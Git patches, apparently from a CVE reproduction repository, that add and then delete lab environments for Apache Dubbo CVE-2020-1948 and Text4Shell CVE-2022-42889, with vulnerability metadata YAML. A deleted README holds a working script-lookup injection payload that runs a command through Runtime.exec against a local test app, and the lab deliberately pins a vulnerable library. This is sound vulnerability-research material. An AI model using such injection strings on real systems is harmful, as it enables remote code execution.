+ process-resources + + flatten + + + + flatten.clean + clean + + clean + + + + + + + + + + org.codehaus.mojo + flatten-maven-plugin + + + + + \ No newline at end of file -- Gitee From 02506f23189a4b82b1a46806c9f1fb0f98d8cee0 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Fri, 7 Apr 2023 16:05:13 +0000 Subject: [PATCH 4/8] add cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml. Signed-off-by: GQ246 --- cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml diff --git a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml new file mode 100644 index 00000000..f3364260 --- /dev/null +++ b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-1948 +source: https://github.com/txrw/Dubbo-CVE-2020-1948 +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + 此漏洞会影响所有使用2.7.6或更低版本的Dubbo用户。攻击者可以发送具有无法识别的服务名称或方法名称以及一些恶意参数有效负载的 RPC 请求。当恶意参数反序列化时,它会执行一些恶意代码。更多细节可以在下面找到。 + scope-of-influence: + Dubbo 2.5.0-2.5.10 + Dubbo 2.6.0-2.6.7 + Dubbo 2.7.0-2.7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-1948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-1948 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2020, Dubbo \ No newline at end of file -- Gitee From 5ce544472b7315330bb5d4ca646b83e0391eb36e Mon Sep 17 00:00:00 2001 From: GQ246 Date: Tue, 11 Apr 2023 14:54:19 +0000 Subject: [PATCH 5/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-Dubbo/2020?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2020/CVE-2020-1948/Dockerfile | 19 - cve/apache-Dubbo/2020/CVE-2020-1948/README.md | 73 --- .../2020/CVE-2020-1948/docker-compose.yml | 9 - .../src/dubbo-spring-boot-parent/pom.xml | 459 ------------------ .../auto-configure-samples/pom.xml | 38 -- .../provider-sample/pom.xml | 89 ---- ...bboAutoConfigurationProviderBootstrap.java | 38 -- .../provider/service/DefaultDemoService.java | 62 --- .../src/main/resources/application.properties | 12 - .../src/dubbo-spring-boot-samples/pom.xml | 96 ---- .../sample-api/pom.xml | 33 -- .../boot/sample/consumer/DemoService.java | 28 -- .../2020/CVE-2020-1948/src/pom.xml | 197 -------- cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml | 21 - 14 files changed, 1174 deletions(-) delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/README.md delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java delete mode 100644 cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml delete mode 100644 cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile b/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile deleted file mode 100644 index 59c3351c..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -FROM maven:3.5-jdk-8 AS pre_jar - -COPY src/ /src/ - -WORKDIR /src/ - -RUN mvn package -DskipTests=true - -FROM szgx/java:8u111_debian - -LABEL maintainer="mO0n@guanxin" version="1.0" - -COPY --from=pre_jar --chown=0:0 /src/target/dubbo.jar /dubbo.jar - -WORKDIR / - -ENTRYPOINT ["bash", "-c", "java -jar /dubbo.jar"] - -EXPOSE 12345 \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md b/cve/apache-Dubbo/2020/CVE-2020-1948/README.md deleted file mode 100644 index f7e4fd14..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/README.md +++ /dev/null @@ -1,73 +0,0 @@ -# Apache Dubbo CVE-2020-1948 测试环境 - -## 引子 - -在这个漏洞出现之初,为了验证该漏洞的危害,我们从互联网上搜寻了很多人整理的例子,发现没有一个能够顺利验证该漏洞,故自己搞了一个,放在这里供大家参考,欢迎交流! - -本环境基于 Apache Dubbo 官方示例环境改造而来,纠正了官方示例程序中几处编译中报错问题。例如: - -- 官方示例代码中应用的 DubboService 类,实际应该 Service。 - -## 编译 - -``` -cd src -mvn package -``` - -编译成功后会在 `src/target` 目录生成 `dubbo.jar` 文件。 - -## 运行 - -``` -java -jar target/dubbo.jar -``` - -运行成功后,监听 12345 端口,可以使用 `telnet` 命令连接测试。 - -``` -telnet x.x.x.x 12345 -# dubbo> ls -l -# PROVIDER: -# org.apache.dubbo.spring.boot.sample.consumer.DemoService:1.0.0 -> published: N -``` - -## 容器化 - -``` -# 构建 -docker build -t dsolab/dubbo:cve-2020-1948 . - -# 运行 -docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d -或 -docker-compose up -d - -# 访问 -telnet x.x.x.x 12345 -``` - -只想快速使用环境(懒得编译环境)的小朋友可以用下面的命令启动我们提供的镜像环境: - -``` -# 需要安装 Docker 和 docker-compose -docker-compose up -d -``` - -## 漏洞验证 - -参见 [Apache Dubbo CVE-2020-1948 反序列化漏洞验证方法](https://github.com/DSO-Lab/Dubbo-CVE-2020-1948/wiki) - -## 参考链接 - -- Dubbo Spring Boot Project - -https://github.com/apache/dubbo-spring-boot-project/ - -- Dubbo Pull Request - -https://github.com/apache/dubbo/pull/6374 - -- Dubbo Mail Archive - -https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml b/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml deleted file mode 100644 index b0ff1ed7..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/docker-compose.yml +++ /dev/null @@ -1,9 +0,0 @@ -version: "3" - -services: - api: - build: . - image: dsolab/dubbo:cve-2020-1948 - container_name: cve-2020-1948 - ports: - - "12345:12345" \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml deleted file mode 100644 index 836b4700..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-parent/pom.xml +++ /dev/null @@ -1,459 +0,0 @@ - - - - - org.apache.dubbo - dubbo-spring-boot-project - ${revision} - ../pom.xml - - - 4.0.0 - - dubbo-spring-boot-parent - pom - Apache Dubbo Spring Boot :: Parent - Apache Dubbo Spring Boot Parent - - - 1.8 - 1.8 - 1.8 - UTF-8 - UTF-8 - 2.3.0.RELEASE - ${revision} - - -server -Xms256m -Xmx512m -Dfile.encoding=UTF-8 -Djava.net.preferIPv4Stack=true - - - - - 3.0.2 - 3.6.0 - 3.0.1 - 0.8.2 - 1.5 - 0.12 - 2.5.3 - 2.19.1 - - - - - - - org.springframework.boot - spring-boot-dependencies - ${spring-boot.version} - pom - import - - - - - org.apache.dubbo - dubbo-dependencies-bom - ${dubbo.version} - pom - import - - - - org.apache.dubbo - dubbo - ${dubbo.version} - - - org.springframework - spring - - - javax.servlet - servlet-api - - - log4j - log4j - - - - - - - - - - - central - https://repo.maven.apache.org/maven2 - - false - - - - - apache.snapshots.https - Apache Development Snapshot Repository - https://repository.apache.org/content/repositories/snapshots - - false - - - true - - - - - spring-milestone - Spring Milestone - https://repo.spring.io/milestone - - false - - - - spring-snapshot - Spring Snapshot - https://repo.spring.io/snapshot - - true - - - - rabbit-milestone - Rabbit Milestone - https://dl.bintray.com/rabbitmq/maven-milestones - - false - - - - - - - central - https://repo.maven.apache.org/maven2 - - false - - - - spring-milestone - Spring Milestone - https://repo.spring.io/milestone - - false - - - - spring-snapshot - Spring Snapshot - https://repo.spring.io/snapshot - - true - - - - - - - - - src/main/resources/ - false - - - ../ - META-INF/ - false - - NOTICE - LICENSE - - - - - - org.apache.maven.plugins - maven-jar-plugin - ${maven-jar-plugin.version} - - - true - true - - true - true - - - ${project.version} - ${project.version} - - - - - - - org.apache.maven.plugins - maven-compiler-plugin - ${maven-compiler-plugin.version} - - true - ${java.source.version} - ${java.target.version} - ${project.build.sourceEncoding} - - - - - org.jacoco - jacoco-maven-plugin - ${maven-jacoco-plugin.version} - - - jacoco-initialize - - prepare-agent - - - jacocoArgLine - - - - jacoco-site - package - - report - - - - - - - org.apache.maven.plugins - maven-enforcer-plugin - - - enforce-rules - - enforce - - - - - [1.8,) - - - project.name - - - project.description - - - true - - - - - - org.apache.maven.plugins - maven-source-plugin - ${maven-source-plugin.version} - - - attach-sources - - jar-no-fork - - - - - - org.apache.maven.plugins - maven-surefire-plugin - ${maven-surefire-plugin.version} - - true - once - ${argline} ${jacocoArgLine} - - - - transporter - ${transporter} - - - serialization - ${serialization} - - - - port - ${port} - - - threadpool - ${threadpool} - - - threads - ${threads} - - - iothreads - ${iothreads} - - - - server - ${server} - - - timeout - ${timeout} - - - length - ${length} - - - connections - ${connections} - - - base - ${base} - - - concurrent - ${concurrent} - - - runs - ${runs} - - - onerror - ${onerror} - - - - - - org.apache.rat - apache-rat-plugin - ${apache-rat-plugin.version} - - - verify.rat - verify - - check - - - - **/*.versionsBackup - **/.idea/ - **/*.iml - **/*.txt - **/*.load - **/*.flex - **/*.fc - **/*.javascript - **/*.properties - **/*.yml - **/*.yaml - **/*.thrift - **/*.sh - **/*.bat - **/*.md - .git/ - .gitignore - - .repository/ - **/.settings/* - **/.classpath - **/.project - **/target/** - **/*.log - CODE_OF_CONDUCT.md - .codecov.yml - .travis.yml - PULL_REQUEST_TEMPLATE.md - CONTRIBUTING.md - README.md - README_CN.md - **/codestyle/* - **/resources/META-INF/** - **/*.factories - **/*.provides - **/*.properties - **/*.json - - - - - - - - org.apache.maven.plugins - maven-release-plugin - ${maven-release-plugin.version} - - true - false - release - deploy - ${arguments} - - - - - - - - - - spring-boot-2.0 - - 2.0.9.RELEASE - - - - - - spring-boot-2.1 - - 2.1.13.RELEASE - - - - - - spring-boot-2.2 - - 2.2.7.RELEASE - - - - - diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml deleted file mode 100644 index a4310f16..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/pom.xml +++ /dev/null @@ -1,38 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-auto-configure-samples - Apache Dubbo Spring Boot :: Samples :: Auto-Configure - Apache Dubbo Spring Boot Auto-Configure Samples - pom - - - provider-sample - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml deleted file mode 100644 index 6150f021..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml +++ /dev/null @@ -1,89 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-auto-configure-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-auto-configure-provider-sample - Apache Dubbo Spring Boot :: Samples :: Auto-Configure :: Provider Sample - - - - - - org.springframework.boot - spring-boot-starter - - - - org.apache.dubbo - dubbo-spring-boot-starter - ${revision} - - - - org.apache.dubbo - dubbo-remoting-api - ${revision} - - - - org.apache.dubbo.samples - dubbo-spring-boot-sample-api - ${revision} - - - - com.rometools - rome - 1.7.0 - - - - - - - - org.springframework.boot - spring-boot-maven-plugin - ${spring-boot.version} - - - - repackage - - - - - false - dubbo - ${user.dir}/target - - - - - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java deleted file mode 100644 index 0c2c2392..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/bootstrap/DubboAutoConfigurationProviderBootstrap.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.provider.bootstrap; - -import org.apache.dubbo.spring.boot.sample.provider.service.DefaultDemoService; - -import org.springframework.boot.SpringApplication; -import org.springframework.boot.autoconfigure.EnableAutoConfiguration; - -/** - * Dubbo Auto-Configuration Provider Bootstrap - * - * @see DefaultDemoService - * @since 2.7.0 - */ -@EnableAutoConfiguration -public class DubboAutoConfigurationProviderBootstrap { - - public static void main(String[] args) { -// new SpringApplicationBuilder(DubboAutoConfigurationProviderBootstrap.class) -// .run(args); - SpringApplication.run(DubboAutoConfigurationProviderBootstrap.class,args); - } -} diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java deleted file mode 100644 index 91c8ea5d..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/java/org/apache/dubbo/spring/boot/sample/provider/service/DefaultDemoService.java +++ /dev/null @@ -1,62 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.provider.service; - -import org.apache.dubbo.config.annotation.Service; -import org.apache.dubbo.spring.boot.sample.consumer.DemoService; - -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; -import org.springframework.beans.factory.annotation.Value; - -import java.util.Random; - -/** - * Default {@link DemoService} - * - * @see DemoService - * @since 2.7.0 - */ -@Service(version = "1.0.0") -public class DefaultDemoService implements DemoService { - - private final Logger logger = LoggerFactory.getLogger(getClass()); - - private final Random costTimeRandom = new Random(); - - /** - * The default value of ${dubbo.application.name} is ${spring.application.name} - */ - @Value("${dubbo.application.name}") - private String serviceName; - - @Override - public String sayHello(String name) { - await(); - return String.format("[%s] : Hello, %s", serviceName, name); - } - - private void await() { - try { - long timeInMillisToWait = costTimeRandom.nextInt(500); - Thread.sleep(timeInMillisToWait); - logger.info("execution time : " + timeInMillisToWait + " ms."); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } - } -} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties deleted file mode 100644 index db9e2dbf..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties +++ /dev/null @@ -1,12 +0,0 @@ -# Spring boot application -spring.application.name=dubbo-auto-configuration-provider-demo -# Base packages to scan Dubbo Component: @org.apache.dubbo.config.annotation.Service -dubbo.scan.base-packages=org.apache.dubbo.spring.boot.sample.provider.service -# Dubbo Application -## The default value of dubbo.application.name is ${spring.application.name} -## dubbo.application.name=${spring.application.name} -# Dubbo Protocol -dubbo.protocol.name=dubbo -dubbo.protocol.port=12345 -## Dubbo Registry -dubbo.registry.address=N/A \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml deleted file mode 100644 index 72f28dee..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/pom.xml +++ /dev/null @@ -1,96 +0,0 @@ - - - - - org.apache.dubbo - dubbo-spring-boot-parent - ${revision} - ../dubbo-spring-boot-parent/pom.xml - - 4.0.0 - - org.apache.dubbo.samples - dubbo-spring-boot-samples - pom - Apache Dubbo Spring Boot :: Samples - Apache Dubbo Spring Boot :: Samples - - - sample-api - auto-configure-samples - - - - - - - org.apache.maven.plugins - maven-deploy-plugin - - true - - - - - - - - - - spring-boot-1.3 - - 1.3.8.RELEASE - - - - - - spring-boot-1.4 - - 1.4.7.RELEASE - - - - - - spring-boot-1.5 - - 1.5.21.RELEASE - - - - - - spring-boot-2.0 - - 2.0.9.RELEASE - - - - - - spring-boot-2.1 - - 2.1.13.RELEASE - - - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml deleted file mode 100644 index bc73fab8..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/pom.xml +++ /dev/null @@ -1,33 +0,0 @@ - - - - - org.apache.dubbo.samples - dubbo-spring-boot-samples - ${revision} - ../pom.xml - - 4.0.0 - - dubbo-spring-boot-sample-api - Apache Dubbo Spring Boot :: Samples :: API - Apache Dubbo Spring Boot Samples API - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java b/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java deleted file mode 100644 index 398591b8..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/dubbo-spring-boot-samples/sample-api/src/main/java/org/apache/dubbo/spring/boot/sample/consumer/DemoService.java +++ /dev/null @@ -1,28 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package org.apache.dubbo.spring.boot.sample.consumer; - -/** - * Demo Service interface - * - * @since 2.7.0 - */ -public interface DemoService { - - String sayHello(String name); - -} \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml b/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml deleted file mode 100644 index 664fec48..00000000 --- a/cve/apache-Dubbo/2020/CVE-2020-1948/src/pom.xml +++ /dev/null @@ -1,197 +0,0 @@ - - - - 4.0.0 - - - org.apache - apache - 21 - - - org.apache.dubbo - dubbo-spring-boot-project - ${revision} - - pom - - Apache Dubbo Spring Boot Project - Apache Dubbo Spring Boot Project - https://github.com/apache/dubbo-spring-boot-project - - - 3.0.1 - 2.19.1 - 2.7.7 - - - - dubbo-spring-boot-parent - dubbo-spring-boot-samples - - - - The Apache Software Foundation - http://www.apache.org/ - - - - https://github.com/apache/dubbo-spring-boot-project - scm:git:git:////github.com/apache/dubbo-spring-boot-project.git - scm:git:ssh://git@//github.com/apache/dubbo-spring-boot-project.git - - - - - Github - https://github.com/apache/dubbo-spring-boot-project/issues - - - - - Development List - dev-subscribe@dubbo.apache.org - dev-unsubscribe@dubbo.apache.org - dev@dubbo.apache.org - - - Commits List - commits-subscribe@dubbo.apache.org - commits-unsubscribe@dubbo.apache.org - commits@dubbo.apache.org - - - Issues List - issues-subscribe@dubbo.apache.org - issues-unsubscribe@dubbo.apache.org - issues@dubbo.apache.org - - - - - Apache Dubbo - The Apache Dubbo Project Contributors - dev@dubbo.apache.org - http://dubbo.apache.org - - - - - - release - - - - org.apache.maven.plugins - maven-javadoc-plugin - 3.1.1 - - - package - - jar - - - - - - - org.apache.maven.plugins - maven-gpg-plugin - 1.6 - - - verify - - sign - - - - - - - org.codehaus.mojo - flatten-maven-plugin - 1.1.0 - - true - resolveCiFriendliesOnly - - - - flatten - process-resources - - flatten - - - - flatten.clean - clean - - clean - - - - - - - - - - - - - - org.codehaus.mojo - flatten-maven-plugin - 1.1.0 - - true - resolveCiFriendliesOnly - - - - flatten - process-resources - - flatten - - - - flatten.clean - clean - - clean - - - - - - - - - - org.codehaus.mojo - flatten-maven-plugin - - - - - \ No newline at end of file diff --git a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml b/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml deleted file mode 100644 index f3364260..00000000 --- a/cve/apache-Dubbo/2020/yaml/CVE-2020-1948.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2020-1948 -source: https://github.com/txrw/Dubbo-CVE-2020-1948 -info: - name: Dubbo是一个高性能优秀的服务框架。 - severity: CRITICAL - description: | - 此漏洞会影响所有使用2.7.6或更低版本的Dubbo用户。攻击者可以发送具有无法识别的服务名称或方法名称以及一些恶意参数有效负载的 RPC 请求。当恶意参数反序列化时,它会执行一些恶意代码。更多细节可以在下面找到。 - scope-of-influence: - Dubbo 2.5.0-2.5.10 - Dubbo 2.6.0-2.6.7 - Dubbo 2.7.0-2.7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-1948 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-1948 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None - tags: cve2020, Dubbo \ No newline at end of file -- Gitee From fed6b76e5ff483ea06d594c2c9d700acd18f6960 Mon Sep 17 00:00:00 2001 From: GQ246 Date: Tue, 11 Apr 2023 14:55:54 +0000 Subject: [PATCH 6/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?docker/2022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/docker/2022/cve-2022-42889/Dockerfile | 18 ------ cve/docker/2022/cve-2022-42889/README.md | 61 ------------------- cve/docker/2022/cve-2022-42889/pom.xml | 46 -------------- .../com/levo/dockerexample/DockerApp.java | 11 ---- .../controller/HelloController.java | 30 --------- .../dockerexample/PlaceHolderForTest.java | 5 -- cve/docker/2022/yaml/cve-2022-42889.yaml | 20 ------ 7 files changed, 191 deletions(-) delete mode 100644 cve/docker/2022/cve-2022-42889/Dockerfile delete mode 100644 cve/docker/2022/cve-2022-42889/README.md delete mode 100644 cve/docker/2022/cve-2022-42889/pom.xml delete mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java delete mode 100644 cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java delete mode 100644 cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java delete mode 100644 cve/docker/2022/yaml/cve-2022-42889.yaml diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile deleted file mode 100644 index a31999b9..00000000 --- a/cve/docker/2022/cve-2022-42889/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# Use an official OpenJDK runtime as a parent image -FROM openjdk:8-jre-alpine - -# set shell to bash -# source: https://stackoverflow.com/a/40944512/3128926 -RUN apk update && apk add bash - -# Set the working directory to /app -WORKDIR /app - -# Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app - -# Make port 8080 available to the world outside this container -EXPOSE 8080 - -# Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md deleted file mode 100644 index 2452d91e..00000000 --- a/cve/docker/2022/cve-2022-42889/README.md +++ /dev/null @@ -1,61 +0,0 @@ -### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- - - -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build - -``` -docker build --tag=text4shell . -``` - -3. Docker run - -``` -docker run -p 80:8080 text4shell -``` - -4. Test the app - -``` -http://localhost/text4shell/attack?search= -``` - -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: - -``` -${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} -``` - -http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D - -6. You can also try using `dns` or `url` prefixes. - -7. Get the container id - -``` -docker container ls -``` - -8. Get into the app - -``` -docker exec -it bash -``` - -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): - -``` -ls /tmp/ -``` - -10. To stop the container - -``` -docker container stop -``` \ No newline at end of file diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml deleted file mode 100644 index 80084258..00000000 --- a/cve/docker/2022/cve-2022-42889/pom.xml +++ /dev/null @@ -1,46 +0,0 @@ - - 4.0.0 - com.levo.dockerexample - docker-java-app-example - jar - 1.0-SNAPSHOT - docker-java-app-example - http://maven.apache.org - - - UTF-8 - UTF-8 - 1.8 - com.levo.dockerexample.DockerApp - - - - org.springframework.boot - spring-boot-starter-parent - 2.1.1.RELEASE - - - - - org.springframework.boot - spring-boot-starter-web - - - org.apache.commons - commons-text - 1.8 - - - - - text4shell-poc - - - org.springframework.boot - spring-boot-maven-plugin - - - - - diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java deleted file mode 100644 index d1d037bf..00000000 --- a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java +++ /dev/null @@ -1,11 +0,0 @@ -package com.levo.dockerexample; - -import org.springframework.boot.SpringApplication; -import 